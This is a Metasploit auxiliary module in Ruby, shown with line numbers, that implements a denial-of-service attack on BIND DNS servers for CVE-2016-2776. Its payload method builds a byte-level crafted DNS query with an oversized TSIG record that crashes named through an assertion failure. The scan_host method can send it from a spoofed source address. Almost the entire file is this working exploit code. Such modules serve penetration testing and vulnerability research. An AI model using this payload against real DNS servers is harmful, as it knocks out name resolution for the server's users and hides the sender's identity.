Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Capture
8
  include Msf::Auxiliary::UDPScanner
9
  include Msf::Auxiliary::Dos
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'BIND TSIG Query Denial of Service',
14
      'Description'    => %q{
15
        A defect in the rendering of messages into packets can cause named to
16
        exit with an assertion failure in buffer.c while constructing a response
17
        to a query that meets certain criteria.
18

19
        This assertion can be triggered even if the apparent source address
20
        isn't allowed to make queries.
21
      },
22
      # Research and Original PoC - msf module author
23
      'Author'         => [
24
        'Martin Rocha',
25
        'Ezequiel Tavella',
26
        'Alejandro Parodi',
27
        'Infobyte Research Team'
28
      ],
29
      'References'     => [
30
        ['CVE', '2016-2776'],
31
        ['URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html']
32
      ],
33
      'DisclosureDate' => '2016-09-27',
34
      'License'        => MSF_LICENSE,
35
      'DefaultOptions' => {'ScannerRecvWindow' => 0}
36
    ))
37

38
    register_options([
39
      Opt::RPORT(53),
40
      OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])
41
    ])
42

43
    deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
44
  end
45

46
  def scan_host(ip)
47
    if datastore['SRC_ADDR']
48
      scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])
49
    else
50
      print_status("Sending packet to #{ip}")
51
      scanner_send(payload, ip, rport)
52
    end
53
  end
54

55
  def payload
56
    query = Rex::Text.rand_text_alphanumeric(2)  # Transaction ID: 0x8f65
57
    query << "\x00\x00"  # Flags: 0x0000 Standard query
58
    query << "\x00\x01"  # Questions: 1
59
    query << "\x00\x00"  # Answer RRs: 0
60
    query << "\x00\x00"  # Authority RRs: 0
61
    query << "\x00\x01"  # Additional RRs: 1
62

63
    # Domain Name
64
    query << get_domain   # Random DNS Name
65
    query << "\x00"      # [End of name]
66
    query << "\x00\x01"  # Type: A (Host Address) (1)
67
    query << "\x00\x01"  # Class: IN (0x0001)
68

69
    # Additional records. Name
70
    query << ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes
71
    query << "\x3d"+Rex::Text.rand_text_alphanumeric(61)
72
    query << "\x00"
73

74
    query << "\x00\xfa" # Type: TSIG (Transaction Signature) (250)
75
    query << "\x00\xff" # Class: ANY (0x00ff)
76
    query << "\x00\x00\x00\x00" # Time to live: 0
77
    query << "\x00\xfc" # Data length: 252
78

79
    # Algorithm Name
80
    query << ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes
81
    query << "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes
82
    query << "\x00"
83

84
    # Rest of TSIG
85
    query << "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan  1, 1970 03:15:07.000000000 ART
86
    query << "\x01\x2c" # Fudge: 300
87
    query << "\x00\x10" # MAC Size: 16
88
    query <<  Rex::Text.rand_text_alphanumeric(16) # MAC
89
    query << "\x8f\x65" # Original Id: 36709
90
    query << "\x00\x00" # Error: No error (0)
91
    query << "\x00\x00" # Other len: 0
92
  end
93

94
  def get_domain
95
    domain = "\x06"+Rex::Text.rand_text_alphanumeric(6)
96
    org = "\x03"+Rex::Text.rand_text_alphanumeric(3)
97
    domain+org
98
  end
99
end
100

101